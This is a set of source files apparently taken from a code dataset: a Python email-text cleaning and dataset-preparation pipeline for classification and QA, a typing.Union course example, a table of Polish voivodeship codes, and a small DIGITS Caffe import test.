rm_punctuation=False): """Remove content from text""" if not isinstance(line, str): line = str(line) # Customer Remove line = cu.remove(line) if rm_email_formatting: line = re.sub(r'<[^>]+>', ' ', line) # Remove HTML tags line = re.sub(r'^(.*\.eml)', ' ', line) # remove header for system generated emails if rm_email_header: #DE/EN if self.language == 'en' or self.language == 'de': line = re.sub(r'\b(AW|RE|VON|WG|FWD|FW)(\:| )', '', line, flags=re.I) #DE if self.language == 'de': line = re.sub(r'(Sehr geehrte( Damen und Herren.)?.)|hallo.|guten( tag)?.', '', line, flags=re.I) if rm_email_footer: #EN if self.language == 'en': line = re.sub(r'\bkind regards.*', '', line, flags=re.I) #DE if self.language == 'de': line = re.sub(r'\b(mit )?(beste|viele|liebe|freundlich\w+)? 
(gr[u,ü][ß,ss].*)', '', line, flags=re.I) line = re.sub(r'\b(besten|herzlichen|lieben) dank.*', '', line, flags=re.I) line = re.sub(r'\bvielen dank für ihr verständnis.*', '', line, flags=re.I) line = re.sub(r'\bvielen dank im voraus.*', '', line, flags=re.I) line = re.sub(r'\b(mfg|m\.f\.g) .*','', line, flags=re.I) line = re.sub(r'\b(lg) .*','',line, flags=re.I) line = re.sub(r'\b(meinem iPhone gesendet) .*','',line, flags=re.I) line = re.sub(r'\b(Gesendet mit der (WEB|GMX)) .*','',line, flags=re.I) line = re.sub(r'\b(Diese E-Mail wurde von Avast) .*','',line, flags=re.I) # Remove remaining characters ##NOTE: may break other regex if rm_punctuation: line = re.sub('['+string.punctuation+']',' ',line) return line def get_placeholder(self, line, rp_generic=False, rp_custom=False, rp_num=False): """Replace text with type specfic placeholders""" # Customer placeholders line = cu.get_placeholder(line) # Generic placeholder if rp_generic: line = re.sub(r' \+[0-9]+', ' ', line) # remove phone numbers line = re.sub(r'0x([a-z]|[0-9])+ ',' PER ',line, re.IGNORECASE) # replace line = re.sub(r'[0-9]{2}[\/.,:][0-9]{2}[\/.,:][0-9]{2,4}', ' PDT ', line) # remove dates and time, replace with placeholder line = re.sub(r'([0-9]{2,3}[\.]){3}[0-9]{1,3}',' PIP ',line) # replace ip with placeholder line = re.sub(r'[0-9]{1,2}[\/.,:][0-9]{1,2}', ' PTI ', line) # remove only time, replace with placeholder line = re.sub(r'[\w\.-]+@[\w\.-]+', ' PEM ', line) # remove emails line = re.sub(r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&amp;+]|[!*\(\),]|(?:%[0-9a-f][0-9a-f]))+', ' PUR ', line) # Remove links line = re.sub(r'€|\$|(USD)|(EURO)', ' PMO ', line) # Placeholders for numerics if rp_num: line = re.sub(r' ([0-9]{4,30}) ',' PNL ', line) # placeholder for long stand alone numbers line = re.sub(r' [0-9]{2,3} ',' PNS ', line) # placeholder for short stand alone numbers return line def tokenize(self, line, lemmatize = False, rm_stopwords = False): """Tokenizer for non DL tasks""" if not isinstance(line, str): line = str(line) if lemmatize and rm_stopwords: line = ' '.join([t.lemma_ for t in self.nlp(line) if not t.is_stop]) elif lemmatize: line = ' '.join([t.lemma_ for t in self.nlp(line)]) elif rm_stopwords: line = ' '.join([t.text for t in self.nlp(line) if not t.is_stop]) return line def transform(self, texts, to_lower = False, # Remove rm_email_formatting = False, rm_email_header = False, rm_email_footer = False, rm_punctuation = False, # Placeholders rp_generic = False, rp_num = False, # Tokenize lemmatize = False, rm_stopwords = False, return_token = False, # Whitespace remove_whitespace = True ): """Main run function for cleaning process""" if isinstance(texts, str): texts = [texts] # Convert to series for improved efficiency df_texts = pd.Series(texts) # Avoid loading errors df_texts = df_texts.replace('\t', ' ', regex=True) # Remove noise if any((rm_email_formatting, rm_email_header, rm_email_footer, rm_punctuation)): df_texts = df_texts.apply(lambda x: self.remove(x, rm_email_formatting = rm_email_formatting, rm_email_header = rm_email_header, rm_email_footer = rm_email_footer, rm_punctuation = rm_punctuation)) # Replace placeholders if any((rp_generic, rp_num)): df_texts = df_texts.apply(lambda x: self.get_placeholder(x, rp_generic = rp_generic, rp_num = rp_num)) # Tokenize text if any((lemmatize, rm_stopwords, return_token)): df_texts = df_texts.apply(self.tokenize, lemmatize = lemmatize, rm_stopwords = rm_stopwords) # To lower if to_lower: df_texts = df_texts.apply(str.lower) # Remove spacing if remove_whitespace: 
df_texts = df_texts.apply(lambda x: " ".join(x.split())) # Return Tokens if return_token: return [t.split(' ') for t in df_texts.to_list()] else: return df_texts.to_list() def transform_by_task(self, text): # CUSTOM FUNCTION if cu.tasks.get(str(self.task)).get('type') == 'classification': return self.transform(text, rm_email_formatting = True, rm_email_header = True, rm_email_footer = True, rp_generic = True)[0] elif cu.tasks.get(str(self.task)).get('type') == 'multi_classification': return self.transform(text, rm_email_formatting = True, rm_email_header = True, rm_email_footer = True, rp_generic = True)[0] elif cu.tasks.get(str(self.task)).get('type') == 'ner': return text[0] elif cu.tasks.get(str(self.task)).get('type') == 'qa': return self.transform(text, to_lower = True, # Remove rm_email_formatting = True, rm_email_header = True, rm_email_footer = True, rm_punctuation = True, # Placeholders rp_generic = True, rp_num = True, # Tokenize lemmatize = True, rm_stopwords = True, return_token = True )[0] else: logger.warning('[WARNING] No transform by task found.') return text[0] def prepare_classification(task, do_format, train_split, min_cat_occurance, min_char_length, register_data): # Get clean object cl = Clean(task=task, download_source=True) # Load data if not os.path.isfile(cl.dt.get_path('fn_prep', dir = 'data_dir')) or do_format: data = dt.get_dataset(cl, source="cdb") else: data = cl.dt.load('fn_prep', dir = 'data_dir') logger.warning(f'Data Length : {len(data)}') # Load text & label field text_raw = cu.load_text(data) data['label'] = cu.load_label(data, task) if cu.tasks.get(str(task)).get('type') == 'multi_classification': data['label'] = data['label'].str.replace(', ', '_').str.replace(' ', '_') flat_labels = [row['label'].split(',') for index, row in data.iterrows()] labels_clean = [] for labels in flat_labels: for label in labels: labels_clean.append(label) label_list_raw = pd.DataFrame({'label':labels_clean}) label_list_raw = label_list_raw[label_list_raw.label != ''] label_list_raw = label_list_raw.label.drop_duplicates() elif cu.tasks.get(str(task)).get('type') == 'classification': # in case of single label classification label_list_raw = data.label.drop_duplicates() # Clean text data['text'] = cl.transform(text_raw, rm_email_formatting = True, rm_email_header = True, rm_email_footer = True, rp_generic = True) # Filter by length data = he.remove_short(data, 'text', min_char_length=min_char_length) logger.warning(f'Data Length : {len(data)}') # Remove duplicates data_red = data.drop_duplicates(subset=['text']) logger.warning(f'Data Length : {len(data_red)}') # Min class occurance if cu.tasks.get(str(task)).get('type') == 'classification': data_red = data_red[data_red.groupby('label').label.transform('size') > min_cat_occurance] elif cu.tasks.get(str(task)).get('type') == 'multi_classification': # Split rows data_transform = data_red[['id', 'label']].copy() data_transform['label'] = [row['label'].split(",") for index, row in data_transform.iterrows()] # pipe it to list data_transform = pd.DataFrame({'index':data_transform.index.repeat(data_transform.label.str.len()), 'label':np.concatenate(data_transform.label.values)}) # explode df data_transform = data_transform[data_transform.groupby('label').label.transform('size') > min_cat_occurance] # count for min occurance and only keep relevant ones data_transform = data_transform.groupby(['index'])['label'].apply(lambda x: ','.join(x.astype(str))).reset_index() # re-merge data_transform = data_transform.set_index('index') del 
data_red['label'] data_red = pd.concat([data_red, data_transform], join='inner', axis=1) logger.warning(f'Data Length : {len(data_red)}') data_red = data_red.tail(300000).reset_index(drop=True).copy() #TODO: .tail() temp is for debugging ## There is a memory issue for the EN dataset, due to its size. Needs further investigation. # Label list if cu.tasks.get(str(task)).get('type') == 'multi_classification': # 2 = task for multi-label classification flat_labels = [row['label'].split(',') for index, row in data_red.iterrows()] labels_clean = [] for labels in flat_labels: for label in labels: labels_clean.append(label) label_list = pd.DataFrame({'label':labels_clean}) label_list = label_list[label_list.label != ''] label_list = label_list.label.drop_duplicates() elif cu.tasks.get(str(task)).get('type') == 'classification': # in case of single label classification label_list = data_red.label.drop_duplicates() logger.warning(f'Excluded labels: {list(set(label_list_raw)-set(label_list))}') # Split data strf_split = StratifiedShuffleSplit(n_splits = 1, test_size=(1-train_split), random_state=200) if cu.tasks.get(str(task)).get('type') == 'classification': for train_index, test_index in strf_split.split(data_red, data_red['label']): df_cat_train = data_red.loc[train_index] df_cat_test = data_red.loc[test_index] elif cu.tasks.get(str(task)).get('type') == 'multi_classification': for train_index, test_index in strf_split.split(data_red, pd.DataFrame({'label':[l.split(',')[0] for l in data_red['label']]})['label']): df_cat_train = data_red.loc[train_index] df_cat_test = data_red.loc[test_index] # Save data cl.dt.save(data_red, fn = 'fn_clean', dir = 'data_dir') cl.dt.save(df_cat_train[['text','label']], fn = 'fn_train', dir = 'data_dir') cl.dt.save(df_cat_test[['text','label']], fn = 'fn_test', dir = 'data_dir') cl.dt.save(label_list, fn = 'fn_label', header=False, dir = 'data_dir') # Upload data if register_data: cl.dt.upload('data_dir', destination='dataset') def prepare_ner(task, do_format, register_data): pass def prepare_qa(task, do_format, min_char_length, register_data): # Get clean object cl = Clean(task=task, download_source=True) # Load data if not os.path.isfile(cl.dt.get_path('fn_prep', dir = 'data_dir')) or do_format: data = dt.get_dataset(cl, source="cdb") else: data = cl.dt.load('fn_prep', dir = 'data_dir') logger.warning(f'Data Length : {len(data)}') # Filter relevant question answer pairs data = cu.filter_qa(data) logger.warning(f'Data Length : {len(data)}') # Load question & answer fields question, answer = cu.load_qa(data) # Clean text data['question_clean'] = cl.transform(question, to_lower = True, rm_email_formatting = True, rm_email_header = True, rm_email_footer = True, rm_punctuation = True, rp_generic = True, rp_num = True, lemmatize = True, rm_stopwords = True ) data['answer_clean'] = cl.transform(answer, to_lower = True, rm_email_formatting = True, rm_email_header = True, rm_email_footer = True, rm_punctuation = True, rp_generic = True, rp_num = True, lemmatize = True, rm_stopwords = True ) # For display data['answer_text_clean'] = cl.transform(answer, rm_email_formatting = True, rm_email_header = True, rm_email_footer = True ) # Filter by length data = he.remove_short(data, 'question_clean', min_char_length=min_char_length) logger.warning(f'Data Length : {len(data)}') # Remove duplicates data = data.drop_duplicates(subset=['question_clean']) logger.warning(f'Data Length : {len(data)}') data = data.reset_index(drop=True).copy() # Save data cl.dt.save(data, fn = 'fn_clean', 
dir = 'data_dir') # Upload data if register_data: cl.dt.upload('data_dir', destination='dataset') def main(task=1, do_format=False, split=0.9, min_cat_occurance=300, min_char_length=20, register_data=False): logger.warning(f'Running <PREPARE> for task {task}') task_type = cu.tasks.get(str(task)).get('type') if 'classification' == task_type: prepare_classification(task, do_format, split, min_cat_occurance, min_char_length, register_data) elif 'multi_classification' == task_type: prepare_classification(task, do_format, split, min_cat_occurance, min_char_length, register_data) elif 'ner' == task_type: prepare_ner(task, do_format, register_data) elif 'qa' == task_type: prepare_qa(task, do_format, min_char_length, register_data) else: logger.warning('[ERROR] TASK TYPE UNKNOWN. Nothing was processed.') def run(): """Run from the command line""" parser = argparse.ArgumentParser() parser.add_argument("--task", default=1, type=int, help="Task where: \ -task 1 : classification subcat \ -task 2 : classification cat \ -task 3 : ner \ -task 4 : qa") parser.add_argument('--do_format', action='store_true', help="Avoid reloading and normalizing data") parser.add_argument("--split", default=0.9, type=float, help="Train test split. Dev split is taken from train set.") parser.add_argument("--min_cat_occurance", default=300, type=int, help="Min occurance required by category.") parser.add_argument("--min_char_length", default=20, type=int, help="") parser.add_argument('--register_data', action='store_true', help="") args = parser.parse_args() main(args.task, args.do_format, args.split, min_cat_occurance=args.min_cat_occurance, min_char_length=args.min_char_length, register_data=args.register_data) if __name__ == '__main__': run()
1.625
2
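A hypothetical call into the Clean pipeline defined in the record above; the task id and sample text are assumptions, and running it requires the project's config and asset files.
cl = Clean(task=1, inference=True)
cleaned = cl.transform(
    ["RE: Hello, please check https://contoso.com before 01/02/2021"],
    rm_email_header=True,
    rm_email_formatting=True,
    rp_generic=True,
)
print(cleaned[0])  # "RE:" header marker stripped, URL and date replaced by placeholders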
section4/video1/union.py
PacktPublishing/Mastering-Python-3.x-3rd-Edition
6
12758571
<filename>section4/video1/union.py<gh_stars>1-10
from typing import Tuple, Iterable, Callable, Union

Pair = Union[Tuple[int, int], Tuple[str, str]]
Single = Union[int, str]


def add(pair: Pair) -> Single:
    return pair[0] + pair[1]


def even(a: Single) -> bool:
    if isinstance(a, str):
        return len(a) % 2 == 0
    return a % 2 == 0


def map(func: Callable[[Pair], Single], objects: Iterable[Pair]) -> Iterable[Single]:
    return [func(x) for x in objects]


def filter(
    func: Callable[[Single], bool], objects: Iterable[Single]
) -> Iterable[Single]:
    return [x for x in objects if func(x)]


if __name__ == "__main__":
    print(filter(even, map(add, [(1, 2), (2, 2), (2, 1), (5, 1)])))
    print(filter(even, map(add, [(1, 2), (2, 2), ("hello", "there"), (5, 1)])))
2.90625
3
RegonAPI/consts/voivodeships.py
damianwasik98/RegonAPI
10
12758699
<filename>RegonAPI/consts/voivodeships.py
# Keys are ISO 3166-2:PL abbr.
VOIVODESHIPS = {
    "DS": {"teryt": "02", "name_pl": "dolnośląskie"},
    "KP": {"teryt": "04", "name_pl": "kujawsko-pomorskie"},
    "LU": {"teryt": "06", "name_pl": "lubelskie"},
    "LB": {"teryt": "08", "name_pl": "lubuskie"},
    "LD": {"teryt": "10", "name_pl": "łódzkie"},
    "MA": {"teryt": "12", "name_pl": "małopolskie"},
    "MZ": {"teryt": "14", "name_pl": "mazowieckie"},
    "OP": {"teryt": "16", "name_pl": "opolskie"},
    "PK": {"teryt": "18", "name_pl": "podkarpackie"},
    "PD": {"teryt": "20", "name_pl": "podlaskie"},
    "PM": {"teryt": "22", "name_pl": "pomorskie"},
    "SL": {"teryt": "24", "name_pl": "śląskie"},
    "SK": {"teryt": "26", "name_pl": "świętokrzyskie"},
    "WN": {"teryt": "28", "name_pl": "warmińsko-mazurskie"},
    "WP": {"teryt": "30", "name_pl": "wielkopolskie"},
    "ZP": {"teryt": "32", "name_pl": "zachodniopomorskie"},
}
0.796875
1
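A small helper showing how the mapping above is typically queried; the helper itself is an illustration, not part of RegonAPI.
def teryt_for(iso_code: str) -> str:
    return VOIVODESHIPS[iso_code.upper()]["teryt"]

print(teryt_for("MA"))  # "12" (małopolskie)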
digits/model/tasks/test_caffe_train.py
PhysicsTeacher13/Digits-NVIDIA
111
12758827
# Copyright (c) 2014-2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import

from digits import test_utils


def test_caffe_imports():
    test_utils.skipIfNotFramework('caffe')

    import numpy  # noqa
    import google.protobuf  # noqa
0.472656
0